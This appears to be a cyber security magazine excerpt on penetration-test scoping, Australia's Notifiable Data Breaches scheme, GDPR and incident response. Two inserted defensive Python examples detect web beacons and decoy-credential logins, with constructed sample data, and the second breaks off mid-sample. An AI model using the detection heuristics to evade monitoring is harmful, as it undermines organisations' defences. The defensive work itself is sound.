If you’re about to commission your first penetration test, or have switched from a regular testing company, I can’t stress this enough: validate your test scope and understand it. Too many engagements start life as a woolly, ambiguous statement that almost always ends in a dissatisfied client. If your test requirement boils down to ‘test our networks’, have a rethink. Ask yourself, honestly, what has motivated your request, and what are your specific goals? When you know and can articulate these, do some background research on the companies offering these services. Ask for references before you engage even the most reputable of companies, since you need someone who can take your requirements and transform them into a set of actions, assigned to appropriately skilled individuals – the quirky testers we profiled earlier. Have a start-up meeting with the testers and make sure you feel confident that they know what you want. Most importantly, if it sounds like pixie-dust and magic will be used, don’t engage with them, since they won’t give you a report that you can use to make improvements in your business.
What if you are a Hiring Manager looking for a Rock Star Tester?
Particularly with penetration testers, stop hiring people because they are a certified anything, or have a computer security degree or an MSc in software engineering. Hire them by testing their capabilities on the tools and their oral and written skills, and by asking them about their hobbies. If they spend 25 hours a day living and breathing penetration testing, it’s a good sign. This is a career that demands passion and obsession, and it’s a hobby for them all: the fact that they get paid bazillions is, to a degree, unimportant to them as individuals. The UK recognised this a few years back and, in collaboration with Government, industry and academia, the Cyber Security Challenge was born; a scheme I wish could be emulated here, because it identifies raw talent irrespective of education and background, rather than being limited to university students. The last word on this is that if you really need to hire a penetration tester but don’t have the capability to assess them, hire a tester to check them out.
Cover Feature Cyber Security
Now what? I have to notify the OAIC? A seven-step plan to keep OAIC at bay.
By David Stafford-Gaffney

It is Monday 19th March and the day started like any other. On your way to the office, you stop at your regular café to grab your coffee; the barista looks at you and says, “large cappuccino?”, you nod, already tasting the coffee in the air, and as you ponder the day ahead, you take a brief moment to peruse the morning’s newspaper. Tucked away on the middle pages, a competitor’s name in the headline catches your eye. It immediately has your attention; you quickly scan it and you are not sure what to make of it. A wry smirk begins to form, just before you completely grasp the reality of the situation. Your competitor has had personally identifiable information, from one of their databases, made open to the public. You repeat the sentence in your head, as the gravity of the breach begins to take hold. You read further: they have had to report to the OAIC. But who is that? You have never heard of them. They are now required to demonstrate the reasonable steps they took to contain the breach and articulate the steps taken to protect the information in the first place. Your gut begins to turn with that uncomfortable knot that tells you that you have lost control over an element of the business and time is of the essence. However, where would you even start? It’s time to find out more about this OAIC…

As you have probably guessed, the competitor has suffered an eligible data breach under the recently sanctioned amendment to the Privacy Act called the Notifiable Data Breaches legislation. Essentially, organisations that qualify under this amendment, due to go live on February 22nd, are required to notify the affected individuals and the Office of the Australian Information Commissioner (OAIC) in the event of an eligible data breach. This does not apply to my organisation, I hear you say, we are too small. The troublesome aspect of this legislation is that the net has been cast wide, in terms of those required to report on a breach. Let us break it down. The legislation contains a few key points that we need to look at in more detail:

• What is the size or type of the organisation that needs to comply?
  o Any organisation that must currently comply with the Privacy Act where:
    - The business or not-for-profit organisation has an annual turnover of more than $3 million.
    - Private sector health service providers.
    - Credit reporting bodies.
    - Credit providers.
    - Entities that trade in personal information.
    - Tax File Number (TFN) recipients.
• What exactly is an eligible data breach?
  o A data breach is considered eligible where the unauthorised access of information is likely to result in serious harm to an affected individual.
• What happens next?
  o The organisation must contain or remediate the unauthorised access or the vulnerability that caused it and then notify the affected individuals and the OAIC.

That is a lot to take in, and hopefully by now you have finished your coffee so we can devise a plan to help your organisation address this. When it comes to addressing this, there is no silver bullet. A holistic approach will be required and there are seven steps you can take to put your organisation in the best possible position, should an eligible breach occur.

1. Create or update your Privacy Policy - You will need to book some time with your lawyer to understand the organisation’s requirements with respect to the Privacy Act. The goal is to create, or if you already have one, update your privacy policy, which will be available to all stakeholders of the business. This provides the basis on which you collect and store information and declares it to all.

2. Identify and classify your information - The next thing to do is to baseline your environment. You will need to understand where your information is, who has access to it and what controls are in place to protect it. Finally, rank the information in order of sensitivity. This does not have to be complex; use a simple high, medium, low if unsure. Understand, however, that this is not always the easiest activity to complete, and there are professional service organisations that can offer assistance by doing assessments. Alternatively, there are tools that will help with information discovery and information management. The key is to understand the information assets of the organisation and document them. This will help when it comes to incident management (point 4).

3. Demonstrate steps taken to secure the organisation – This is about being able to demonstrate what you have done to prevent an attack and therefore a data breach. There are a number of ways this can be done. However, for the smaller organisations that fall into the categories above, the best place to start will be the Australian Signals Directorate’s (ASD) Essential Eight. This will provide the eight most effective controls for mitigating 80% of cyber threats.
Not all the controls are easy to implement, however, there is a guide that offers a complexity rating for the implementation of the controls. There is also a maturity model (Figure 1) available. Simply run through the list with your internal team or service provider, mark what you have in place and the maturity and what you do not have in place. Build a strategic or tactical plan to implement the remaining controls. If costs are associated, raise a risk around the new legislation and the impact a breach will have on the organisation and list the mitigations for that risk, which will include items on your roadmap.
[Figure 1: Essential Eight maturity rating for patching operating systems]

4. Manage incidents in a repeatable and predictable manner – the legislation sets out to understand what you have done to contain the incident. This is about developing and documenting an Incident Response Plan. The key here is to make this as practical as possible. Basic steps include:
a. Define roles and responsibilities with respect to managing an incident. Think about who will manage the team fixing things, who will communicate with the business, who will track everything that’s being performed, and who will actually manage the incident.
b. Define a set of categorisations of incidents, based on your information classification (step 2). Then define response times, update intervals, levels of urgency required, individuals that need to be notified and an escalation path.
c. Categorise the current incident by giving it a priority rating.
d. Include the process flows of activities, so that whoever is running with the incident has a guide as to how this should play out.
e. Include a template for recording activities that can be emailed or printed, so that every action that is taken can be recorded.
f. Include a meeting minutes template, so meetings and decisions made can be documented.
g. Include a list of key contacts and go to town on this; well, you probably do not need to include the barista’s information. However, include the locksmith, the plumber (in case of flooding from a burst tap), glass repairer, lawyer, executives, and anyone else you may need to call in the event of an emergency.
h. Finally, and I cannot stress the importance of this enough: include a post-incident review template. Keep it simple: what happened? Why? How? Lessons learned? Keep it objective and free from personal attack so you narrow it down to a process or technology where possible. You will dramatically reduce the likelihood of this incident occurring in the future.
5. Know your breach reporting obligations – It is critical you know how to report a breach before it happens. Educate senior managers, and feel comfortable in your obligations. The best place to get information to help you with this is the Office of the Australian Information Commissioner’s website. It is a good idea to look through it and familiarise yourself with it, as it is a good resource. It can be found here: https://www.oaic.gov.au/privacy-law/privacy-act/notifiable-data-breaches-scheme

6. Review and improve – Set aside a recurring appointment for 4 hours or so and review this set of documents and artefacts quarterly. People change roles, technology is updated and new technology is introduced, internal processes change, and the size of organisations changes.

Breaches will happen, it is almost certain now. The key is taking a pragmatic approach, preparing as much as you can, and being able to demonstrate what you have done. Interestingly, despite it being somewhat of a compliance exercise, your organisation will actually be less likely to be a victim of an attack as a result of this activity. The next time you get your large capp and sit down to read the paper and your organisation is smack bang in a headline, you will have been expecting it and have probably bought the paper shortly after your coffee, to show the executive how methodical the process has been, minus the uncomfortable knot in your gut!
WHY DO INFORMATION-RELATED STANDARDS (SECURITY, PRIVACY, ASSETS, AND RECORDS) MATTER TO BOARDS? FAILURE TO MEET A STANDARD CAN LEAD TO LEGAL LIABILITY – HOW DOES THIS WORK?

Due diligence and due care play a part in determining legal liability. Directors can be legally charged with negligence and held accountable for any ramifications of that negligence.

Three factors that contribute to the determination of liability:
1. A legally recognised obligation;
2. Failure to conform to the required standard; and
3. Proximate causation resulting in injury, damage or loss.

What is due diligence and due care?
• Due diligence - the act of investigating and understanding the risks that the entity faces, including information-related risks.
• Due care - the act of developing and implementing risk management ‘solutions’ that address the risks identified during the due diligence process.

The “reasonable man test”
• Would a hypothetical, reasonable man in the shoes of the ‘accused’ have acted in the same way in the same circumstances?
• Liability ensues if the accused person’s (director’s) actions fall short of the hypothetical, reasonable man.

Law, standards and the “reasonable man test”
• Law – the entity (through its directors) must comply.
• Risk – the entity (through its directors) may choose to comply or not to comply.
• Negligence - the entity (through its directors) fails to meet a required standard of the ‘reasonable man test’.

Risk management
Risk management involves accepting, rejecting, reducing and transferring risk. Risk management ‘solutions’ are invariably provided through accreditation with a standard or assisted by the partial adoption of a standard, which in simple terms have the effect of establishing what is reasonable under certain circumstances.

Examples of relevant information-related standards
• ISO/IEC 29100:2011 - Information technology - Security techniques - Privacy framework.
• ISO/IEC 27000 family - Information security management systems.
• ISO 15489-1:2016 - Information and documentation - Records management - Part 1: Concepts and principles.
• ISO 55001:2014 - Asset management - Management systems - Requirements (including information assets).
*There are hundreds of relevant International and Australian standards that can be relied upon and/or used for guidance.
DISCLAIMER This document is part of AISA’s Information Briefing series prepared by the Australian Information Security Association and has been designed to provide background information only. It is not designed to replace legal advice or a detailed review of the subject matter. This document should not be relied upon as a basis for making business decisions or as a substitute for professional advice (legal or other). To the extent permitted by law, the Australian Information Security Association excludes all liability for any loss or damage arising out of the use of the material in this document. Any links to third-party websites are provided for convenience only and do not represent endorsement, sponsorship or approval of those third parties. The opinions expressed do not necessarily represent the view of the Australian Information Security Association.
ABOUT US As a nationally recognised not-for-profit organisation, the Australian Information Security Association (AISA) champions the cyber security safety of the Australian public as well as businesses and governments. Established in 1999, AISA has become the recognised authority on information security in Australia.
For more information
t: (02) 8076 6012
w: aisa.org.au
e: info@aisa.org.au
Australian Information Security Association www.aisa.org.au Authored by: Helaine Leggat. 24022018
PRIVACY AMENDMENT (NOTIFIABLE DATA BREACHES) ACT 2017 (AN AMENDMENT TO THE PRIVACY ACT 1988)
PII is regarded as high-value, high-sensitivity information
‘Privacy’, ‘data privacy’ or ‘personally identifiable information’ (PII) is information that identifies an individual, or has the potential to identify an individual. In Privacy Commissioner v Telstra Corporation Limited [2017] FCAFC 4 (19 January 2017), the Court confirmed that even if a single piece of information is not on its own about the individual, it may be about the individual, and be considered PII, when combined with other information. PII is regarded as high-value, high-sensitivity information. Under the law, PII is required to be respected and protected. This, however, cannot be accomplished without information security.

Public and private sector organisations in Australia and elsewhere are obliged to comply with laws that regulate the collection, use, storage, disclosure and security of PII. In Australia, PII is primarily regulated by the Federal Privacy Act of 1988 (Privacy Act), an Act that has been amended numerous times over almost 30 years, most recently by the Privacy Amendment (Notifiable Data Breaches) Act 2017 (NDB Act), which came into force on 22 February 2018. The latest amendment introduced a mandatory Notifiable Data Breach Scheme (NDB Scheme).
The objective of the NDB Scheme is to strengthen the protection of PII and improve transparency to ensure organisations respond to serious data breaches, support consumer and community confidence, and give individuals the opportunity to take steps to minimise the damage that can result from unauthorised use of their PII.
Who must comply with the NDB Scheme?
The same organisations that must comply with the Privacy Act, namely:
• Australian, ACT and Norfolk Island public sector agencies;
• Private sector organisations with an annual turnover over $3 million;
• Health service providers; and
• Some small businesses and non-government entities.

The NDB Act provides new definitions and concepts:
• “at risk” from an eligible data breach;
• “eligible data breach”; and
• Notification of eligible data breaches where there is “interference with the privacy of an individual”.
An “Eligible Data Breach” (EDB) triggers the obligation to notify the Australian Privacy Commissioner and affected individuals in certain circumstances.
Data breach notification is mandatory in four situations - If:
1. An APP entity holds personal information, and must comply with the APPs and take reasonable steps to protect the personal information from misuse, interference and loss, and from unauthorised access, modification or disclosure; OR
2. A credit reporting body holds credit reporting information and must secure the information; OR
3. A credit provider holds credit eligibility information and must secure the information; OR
4. A tax file recipient holds tax file number information and must secure the information;
AND, if there is unauthorised access or unauthorised disclosure; AND, a reasonable person would conclude that this is likely to result in serious harm to any individual to whom the information relates; OR, if the PII is lost and the loss will lead to unauthorised access or disclosure, and then to serious harm or puts the individual at risk; THEN, the access or disclosure is an EDB and a breach must be notified.

Remedial action - If the entity takes action:
• Before access, disclosure or loss results in serious harm; and
• As a result, a reasonable person would conclude that serious harm would not result to the individuals concerned;
THEN, the entity is not required to notify.
Exceptions - There are various exceptions to the obligation to notify a breach. These include where the applicable entity is required to notify under the My Health Records Act 2012, and for reasons involving NDB of other entities, law enforcement, secrecy, and where the Privacy Commissioner makes a declaration not to notify.
Serious harm - Under the NDB Scheme, serious harm will be assessed according to the kinds of information involved, its sensitivity, whether it was protected (including by encryption and access controls), and the kinds of persons who have obtained the information. The objective test will apply to assess reasonableness, meaning that what is reasonable is a question of fact in each individual case.

Suspected EDBs and the requirement to undertake an assessment - If an entity is aware that there are reasonable grounds to suspect an EDB, but not aware there are grounds to believe it, the entity must carry out a reasonable and expeditious assessment, and complete this assessment in 30 days.

Breach statement - If an entity is aware there are reasonable grounds to believe there has been an EDB, it must, as soon as practicable after becoming aware of the EDB:
• Prepare a statement; and
• Give a copy of the statement to the Privacy Commissioner.

Statement contents - The statement must set out:
• The identity and contact details of the entity;
• A description of the EDB;
• The kind or kinds of information concerned; and
• Recommendations about the steps that individuals should take in response.

Who must be notified and when? - As soon as practical after the statement is prepared, the entity must:
• Use the usual means of communicating with individuals;
• Notify each individual to whom the information relates; or
• Each of the individuals who are at risk; or if this is not possible:
• Publish the statement on the entity’s website; and
• Take reasonable steps to publicise the contents of the statement.

The Privacy Commissioner – May direct an entity to notify an EDB, and may by written notice direct the entity to take any of the actions mentioned above.
Commissioner Powers - The sanctions for non-compliance with the NDB scheme are the same sanctions as those that apply under the Privacy Act. The Commissioner has powers to investigate, make determinations, and provide remedies.

Sanctions - Include civil penalties for serious or repeated interferences with privacy, and penalties up to $420,000 for individuals and $2.1 million for organisations.

What must be done to comply? Applicable entities must implement:
• Practices;
• Procedures; and
• Systems,
that relate to their functions or activities and will:
• Ensure compliance with the 13 Australian Privacy Principles (APPs) and registered APP code (if any);
• Enable inquiries or complaints from individuals to be addressed; and
• Enable data breach reporting.

Australia in relation to the EU and the US – There are three major influences arising from:
• The Judgment of the Court of Justice of the European Union in Schrems vs. Data Protection Commissioner on 6 October 2015, where the Court ruled that the “Safe Harbor Decision” on data transfers to the US was invalid, and the subsequent introduction of the “Privacy Shield”;
• The adoption of the European Union General Data Protection Regulation (GDPR) in April 2016, which supersedes Directive 95/46 adopted in 1995, which has been the basis of the data protection laws of the 30 European Economic Area Member States; and
• The Australian NDB.

The Privacy Shield is already in operation between the EU and the US, where it is supported by the US Government. However, there is no such arrangement in Australia, and therefore Australian entities need to rely on other arrangements. The GDPR will become applicable on 25 May 2018, just three months after the NDB Scheme in Australia.

Australian businesses and GDPR – Australian businesses will need to comply with the Privacy Act (which includes NDB) and GDPR where they:
• Have an establishment in the EU;
• Offer goods and services in the EU; or
• Monitor the behaviour of individuals in the EU.
PRIVACY AND SURVEILLANCE, INCLUDING DATA LOSS PREVENTION, COOKIES AND WEB BEACONS BROADER CONTEXT FOR DIRECTORS
The issue:
• The general rule is that telecommunications, data, and other laws prohibit surveillance and monitoring (exceptions exist and sanctions apply).
• Surveillance and monitoring limit or interfere with privacy (and data/personal information protection).
• It is necessary to understand surveillance technologies in order to comply with privacy law.
• Relevant technologies include data surveillance devices, listening devices, optical surveillance devices, tracking devices, geo-location devices etc.
• Surveillance and monitoring is necessary for security in both private and public sector organisations.
• Compliance and risk management involve competing rights/expectations.
• Director duties of due diligence and due care apply.
Data loss prevention (DLP) is a strategy that makes sure users do not send sensitive or critical information outside the corporate network. Business rules are applied to DLP software to classify and protect confidential and critical information (including Personal Information, “PI”) so that accidental or malicious distribution of internal information does not put the organisation at risk.

Surveillance – The deployment of DLP involves the surveillance and monitoring of internal (and external) users through various logical means, including telecommunications and data surveillance.
Surveillance impacts directly upon privacy, the Privacy Act 1988, and the Notifiable Data Breach obligations, which came into force on 22 February 2018.
Cookies are text files (state information, technology aware) supplied by a web server to a browser in response to a request for a resource, which the browser stores temporarily and returns to the server on any subsequent visits. Two kinds of cookies are commonly employed: session-based cookies, which last while a user’s browser is open and are automatically deleted when the browser is closed; and persistent cookies, which last until a user or a browser deletes them, or until they expire.

Web beacons, adTech and tracking objects – a web beacon is a tiny image (object file, also called a tracking bug, tag, tracking pixel, or JavaScript tag). Unlike cookies, which can be accepted or declined by a user, a web beacon arrives as a GIF or other file object. Web beacons are placed on a user’s computer (or email) to track activity, creating a detailed profile of the user’s behaviour, enabling others to use, access and manipulate (read and write) a user’s accessible files, and collect the:
• IP address of the computer that fetched the beacon;
• URL of the page where the beacon is located;
• URL of the web beacon;
• Time the web beacon was viewed;
• Type of browser that fetched the beacon; and
• A previously set cookie value.
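As an added example, not part of the AISA briefing, the Python script below flags images in a page or email body that show the beacon characteristics described above (tiny or hidden, served from a third-party host, carrying query parameters that can encode a user or message id); the HTML, host names and page host are constructed sample values.

```python
"""Flag likely web beacons (tracking pixels) in an HTML document.

Heuristics, each counted as one indicator:
  - the <img> is 1x1 or 0x0, or hidden by inline style;
  - it is served from a host other than the page's own;
  - its URL carries query parameters (often a user or message id).
An image with two or more indicators is reported as a likely beacon.
"""
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlparse


class BeaconFinder(HTMLParser):
    """Collect every <img> tag together with its beacon indicators."""

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.images = []  # one dict per <img> seen

    def handle_starttag(self, tag, attrs):
        if tag != "img":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        src = a.get("src", "")
        if not src:
            return
        parsed = urlparse(src)
        # A relative src is fetched from the page's own host.
        host = (parsed.hostname or self.page_host).lower()
        indicators = []
        tiny = ("0", "1")
        if a.get("width", "").strip() in tiny and a.get("height", "").strip() in tiny:
            indicators.append("tiny image")
        style = a.get("style", "").replace(" ", "").lower()
        if "display:none" in style or "visibility:hidden" in style:
            indicators.append("hidden by style")
        if host != self.page_host:
            indicators.append("third-party host")
        params = sorted(parse_qs(parsed.query))
        if params:
            indicators.append("query parameters " + ",".join(params))
        self.images.append({"src": src, "host": host, "indicators": indicators})


def find_web_beacons(html_text, page_host, min_indicators=2):
    """Return the <img> entries carrying at least min_indicators indicators."""
    finder = BeaconFinder(page_host)
    finder.feed(html_text)
    finder.close()
    return [img for img in finder.images if len(img["indicators"]) >= min_indicators]


# Constructed sample: a company page containing a normal logo, a CDN banner
# and a third-party tracking pixel carrying a user id and a message id.
SAMPLE_HTML = """
<html><body>
<img src="/static/logo.png" width="200" height="60" alt="logo">
<p>Your statement is ready.</p>
<img src="https://cdn.example.net/banner.jpg" width="600" height="120">
<img src="https://track.example-adtech.invalid/p.gif?uid=4821&msg=7" width="1" height="1">
</body></html>
"""

if __name__ == "__main__":
    for hit in find_web_beacons(SAMPLE_HTML, "www.example.com"):
        print(hit["host"], "->", "; ".join(hit["indicators"]))
```

Lowering min_indicators to 1 also reports the CDN banner, which shows why a single indicator (a third-party host alone) is too weak on its own.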
Australian Information Security Association www.aisa.org.au Authored by: Helaine Leggat. 24022018
Cyber Security - Sponsored by Micro Focus
Executive Editor’s Interview with David Kemp
Executive Editor’s interview (Extract) with David Kemp, Specialist Business Consultant with Micro Focus
By Chris Cubbage, Executive Editor

General Data Protection Regulation: Insights into the fundamentals, ramifications & opportunities

The European Union’s General Data Protection Regulation comes into effect on 25th May. In March, David Kemp, Specialist Business Consultant with Micro Focus, was in Australia to examine the Australian market against three key propositions:
1. To what extent does GDPR impact Australian entities handling the personal data of EU residents?
2. Are the lessons learned over the last two years, relating to GDPR in the United Kingdom, lessons that can be carried across to the Australian market, and what is their relationship to the Australian Privacy Act 1988 and subsequent amendments?
3. GDPR is a catalyst for addressing bigger issues, both in relation to security and data lifecycle management – like yin and yang, they are inseparable in terms of ensuring data privacy. So, we want to see what else Micro Focus can do for the Australian market.

In explaining the business benefits of adopting the GDPR Compliance framework, David highlights, “There are several major benefits that we have found in Europe, which we are validating here in Asia.
1. First, the pure compliance piece, making sure you are being a good citizen as a corporate or government agency, and that you are avoiding the reputational damage if you get it wrong, along with any relevant fines. Here in Australia, the fine is $2.3 million compared to GDPR, which imposes a penalty of up to 4 per cent of your global revenue or 20 million euros, whichever is higher.
2. Secondly, we can look at client audit. If you had to encapsulate these issues in relation to privacy in one word, it would be “trust”. Can I trust a product provider or service provider, bank, insurer, or even a transportation company, with my information? Many retail consumers are asking, are you GDPR effective? In Australia, the same question is being asked: are you compliant with Australian privacy laws? If not, you don’t get their business. This is a day-to-day occurrence, compared to a fine or a regulatory hit, which might impact only a few entities.

There are two fundamental aspects to the GDPR:
1. The data type – people think this is just about dealing with emails or Word documents. However, it is any data: audio, visual, alphanumeric, and social media data. I was looking at an advert for the OCBC Bank in Singapore last week and they have a capability called voice banking. Both voice and facial recognition data types are also PII. So, Pandora’s box is already open; when I press the button in Europe and say I want to be forgotten in 28 days, you are going to have to find all of it. That’s just one axis.
2. The second axis is very important and it’s about location of data. Regulators seem to think that it’s about where your laptop is or where your Exchange server is hosted, but it’s not just that. It’s all endpoint devices. I was talking to the senior IT architect of a global bank and he said, “the mobile phone is our prime means of communication with our retail customers.” I think most people know that anyway, especially millennials, so from that point of view, where is the data? It could be an endpoint device, a mobile phone, a laptop, stored in a PC, or even a records management system, in an archive, in a backup or stored as hard copy in Iron Mountain. When I press the button to be forgotten with my bank, they need to look in every one of those silos, which is incredibly difficult. These are the two fundamental challenges that lie behind the ability to provide security and data lifecycle management.”

52 | Australian Cyber Security Magazine
Regulation & Enforcement

Will the regulators in Europe have the manpower and scope to enforce these laws? In David’s view, “They have the power, but this is an important point: do they have the resources? I come from a banking background, with over 19 years’ experience, and I have found that regulators rarely have the capability to pursue and audit everyone. But they can carry out selective audits, and they are already warning organisations and government departments in Britain and Ireland that they will be audited by the 25th May. Regulators teach by example. The other issue is to what extent are regulators being helpful? The regulations are rather broad. One of the mantras we have as Micro Focus is, you need a legal opinion, internal or external, to translate regulations into business functionalities – both in relation to security and data lifecycle management. Only then can you achieve a level of confidence; of course, it’s not always technology, since people, process, policy and procedures are important, but technology also has a role to play. The real question for people is, to what extent is your technology capable? Articles 34/3 and 30 of GDPR talk about appropriate technical measures being taken to reduce exposure. If you have done that, you are providing yourself with remediation and exemption. But, to come back to answering the question, the regulators will do things by example – so the real question that should be asked is, “To what extent are regulators in Europe helping people?” I would say that in Ireland and the United Kingdom the regulators are particularly helpful; you look at their websites, they have guidance, checklists and recommendations on what you should do. There have been other instances in the Nordic region where the regulators are simply just waiting to see what happens. Who will enforce it? The point is that you cannot afford to wait, and you can’t afford to second guess it.
Opportunities: Redundant, Duplicate, Obsolete, or Trivial

Many corporations in Europe don’t look at over 30 per cent of their data; they don’t even know where it is or what is in it. It could be what we call ‘RDOT’ - redundant, duplicate, obsolete, or trivial, and someone thought they would load up Game of Thrones on a hard drive for everybody’s enjoyment. If you take this away, what are you doing? The possibility of proper data analytics. Operational efficiency is an important point. Therefore, what the CIOs have been doing is shrinking the data, reducing the size of the haystack to make it easier to find the needle, and that fits in with the bigger, longer-term strategies of application retirement. At the same time, they are reducing the cost of their backup and recovery. We are talking ROI, which may sound strange in terms of compliance.

The third axis is revenue. How can I make money out of GDPR or the privacy regulations? It comes back to ‘trust’ and brand loyalty. I will stay with you, providing that I can still trust you; I will come and join you as a provider of products and services, provided you are compliant. It improves my data mining. I was talking to a CIO of a large Asia Pacific bank recently, who said, ‘I want to improve the ability of my high net worth managers and also my retail customer managers to create new products and services; to do that you need to mine the information, but the question is, how can you mine it in an appropriate way?’ That is really where encryption comes in. To a certain extent, they don’t need to know me down to my exact street, they don’t even need to know my precise age, but simply the decade in which I lived. So, the idea of being able to access this information in a compliant way, we are talking about creating ‘new money’ and ‘new capabilities’.

Let me just give you one more example. There is a large Japanese corporation that makes Sat-Nav devices. I changed car recently and said to the car dealer, ‘My Sat-Nav tells you quite a lot about where I live, who my friends are, where my family is and whatever. I want that scrubbed.’ What this Japanese corporation is planning to do is not only sell the Sat-Nav to Volkswagen but offer to bring back the data out of my Sat-Nav, cleanse it, encrypt it and send it back so they can use it for marketing purposes, but now it’s cleansed. What have they done? They have created a new revenue stream. Very clever.
Privacy By Design
Under GDPR, within 28 days you must find my data in any format anywhere in your enterprise and you must delete it and produce an audit trail to prove you have done it. The judges don’t understand the algorithms, but they can see the output. So, you need to prove you have achieved this. When you think of investigations such as with WikiLeaks, the Panama Papers, or the Paradise Papers, this is becoming a much more high-profile issue. I don’t believe that on the 26th May in Europe there are going to be calamitous class actions, but it is possible. Furthermore, I don’t think you need a class action suit to fundamentally wreck the reputation of the business that lost all its customers’ data. You just need social media, and customers saying, ‘have you seen the same thing as I have?’

The final point to highlight is privacy by design: the concept that, from here on in, every time you create a new product or service, privacy is baked in. That means you are taking positive action in terms of analysis to anonymise or protect data, making this a fundamental part of business. Personally, I think this will change the corporate view, because you don’t have a choice.

Micro Focus is a UK-based software company and is the largest tech stock on the UK stock exchange. Micro Focus merged last year with Hewlett Packard’s software division, creating the 7th largest software company in the world, with a market capitalisation of close to $13 billion and revenue of $4.4 billion. Visit www.microfocus.com
VIEW - VIDEO: https://australiancybersecuritymagazine.com.au/david-kemp-of-micro-focus-provides-an-in-depthexplanation-into-the-gdpr/
LISTEN – PODCAST: https://australiancybersecuritymagazine.com.au/episode-48-implications-opportunities-ofthe-european-unions-gdpr-and-australias-ndbscheme/
Breach notification isn’t just about breach notification
By Samantha Humphries

Mandatory breach notification is fast becoming a requirement all over the world. Whether you need to comply with GDPR on a global level, with NDB more locally in Australia, or another regulation that’s relevant to your vertical, it’s becoming more commonplace. And, frankly, it’s about time.

Data has long had a monetary value attached to it, whether it be personal data, financial data, proprietary data, or state secrets. Stolen login credentials can trade hands on the dark web for a mere handful of cents, and with password reuse an all too common occurrence, it’s not complicated for an attacker to gain access to a whole lot more information with a small amount of effort.

I’m not going to go into lecture mode about password hygiene right now. As security professionals, we all know the drill, so we understand it’s on us to both educate and protect the users as best we can.

I do want to share a story with you about a person I met last year, who had been through the nightmare that is identity theft. This person is certainly not counting the pennies in their bank account; their credit rating was incredible; yet they now have to prove that they are really, really, really them every time they speak to financial or service providers, and their once awesome credit rating is most definitely in repair mode. The ‘other them’ took out loans, credit cards and store cards in their name, changed their address multiple times, and took out utility contracts in order to get ‘proof’ of address. Getting this resolved is still taking up a lot of their time, and there is no one throat to choke when it comes to getting assistance.

This story, which is by no means an isolated event, goes to show how leaked personal data can have a massive impact on someone’s life. So, as a person who shares my data with organisations, I am very pleased to see that regulatory compliance is putting the onus on both protecting my data and letting me know if it’s fallen into the wrong hands.

Breach notification, whilst not something that is “fun”, is just one part of the incident response puzzle. The act of sending an email to customers or updating some code on a webserver is something that happens regularly, but getting the message right is critical. Crafting the message in a way that resonates with your customers isn’t something that
organisations always do well. To be the bearer of bad news, but in a manner that reassures people that you are doing everything you can to deal with the situation, takes a certain level of skill and decorum. Maersk is a good example of getting this right. During its outage caused by the Not-Petya attack, they were updating customers regularly through their website and social media, and said that their managers were empowered to help customers. They were transparent, and put the customer front and centre, whilst dealing with the impact of the incident.

Let’s rewind somewhat though, as crisis communications is still a smaller, albeit vital, part of the bigger picture. It all starts with incident detection and response. There has never been a more important time to be able to detect, investigate, and respond to attacks quickly and effectively. In security and IT, we often talk about three pillars: people, process, and technology - and all three are equally important when it comes to incident detection and response.

All of us are well versed in the benefits of having solid defences in our networks and extended ecosystems, yet we see that attackers still get through. That’s not to say that we should give up on defending and take up landscape gardening instead, but we do need to be prepared for the worst happening.

Your organisation likely has an incident response plan, probably documented somewhere, and hopefully printed out onto actual paper too. If it only resides on an internal website, please do print it out, as otherwise it’s altogether possible that when you need it most you won’t be able to access it.

So, now that the printer is chirping away, think about when you last reviewed that plan. Threats and attacks change, as do the motivations behind them, so your plan needs to be reviewed regularly to ensure it’s relevant. Does it contain names and phone numbers of people to contact, or functional teams and multiple contact methods? Is there a single generic plan for all incident types, or a playbook covering a multitude of options depending on the issue at hand? In both cases, the latter option is what you should be aiming for.

Threat modelling will help you tailor your plan to your specific organisation’s needs. If you are a small company, and believe it’s unlikely an attacker will want to go after your data, think again. For example, a ransomware attack could be at best costly, and at worst leave you unable to do any business at all for days, possibly to the point of being terminal. If you’re part of a larger supply chain, you are a prime asset on the way to the larger mission target too. An attack on Swisscom in 2017, resulting in the exposure of 800,000 customers’ records, was reported as originating from a sales partner.

It is also a Good Thing™ to put your playbook through its paces on a regular basis. I’ve spent a lot of my years helping organisations recover from outbreaks and attacks, and every single time it was documented that the IR processes needed to be dry run periodically. More often than not, this did not happen until the next event, and the same hollow promises were repeated. Take the time to test out your plans, as this will help you find the gaps. This doesn’t mean you should be riddling your network with malware to see how you get on; there are various types of fire drills you can perform: penetration tests, threat simulations (aka tabletop exercises), purple teaming (where red and blue teams go up against each other), and indeed checking that your phone tree and alternate communications methods work correctly. Your processes should be watertight; otherwise, your people will be struggling from the outset.

This segues nicely into the People part. Clear roles and responsibilities during an incident will help things run much more smoothly. Single points of failure are bad – the person you need for xyz thing will undoubtedly be sunning themselves in the Maldives when you need them most. Make sure too that you know who to contact at your vendors, as you may well need them to join in your response efforts. It may be that you are at an organisation with a well-staffed security operations centre, with a team of decorated incident responders, who can handle this stuff in their sleep, except they don’t even need sleep because they are super beings who may or may not pass the Voight-Kampff test. However, this isn’t a luxury that all organisations have, and as we well know, hiring and retaining these types of people is not the easiest. If this is the case for you, it’s worth investigating managed services options, as this will provide you with the eyes, ears, and mind-set that will help you detect and respond to incidents.

Technology is by no means the last thing on the list – ideally, you need to be able to spot potential issues early, whether that’s someone starting to roam around your network using stolen or compromised user credentials, or some as yet unidentified malware spawning a process on an endpoint. Think about whether your current security stack has the capabilities to do this. Additionally, deception technologies, which are essentially trip wires, can set off alarm bells allowing you to investigate and respond before it’s too late.
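The trip wire idea above, as an added example that is not from the article: a honey-credential detector run over constructed authentication log lines. Decoy accounts are never used legitimately, so any attempt to authenticate as one is a high-confidence alert whether or not it succeeded; account names, hosts, addresses and the log format are all constructed.

```python
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Set

# Decoy accounts we planted in the directory (constructed names; nothing legitimate uses them).
HONEY_ACCOUNTS: Set[str] = {"svc_backup_legacy", "finance_admin_old"}

# Constructed authentication log in a simple key=value format (not real data).
SAMPLE_LOG = """\
2018-03-01T09:12:01Z auth host=fs01 user=alice src=10.0.4.12 result=success
2018-03-01T09:13:44Z auth host=fs01 user=bob src=10.0.4.20 result=failure
2018-03-01T09:15:02Z auth host=dc01 user=svc_backup_legacy src=10.0.9.77 result=failure
2018-03-01T09:15:03Z auth host=dc01 user=svc_backup_legacy src=10.0.9.77 result=success
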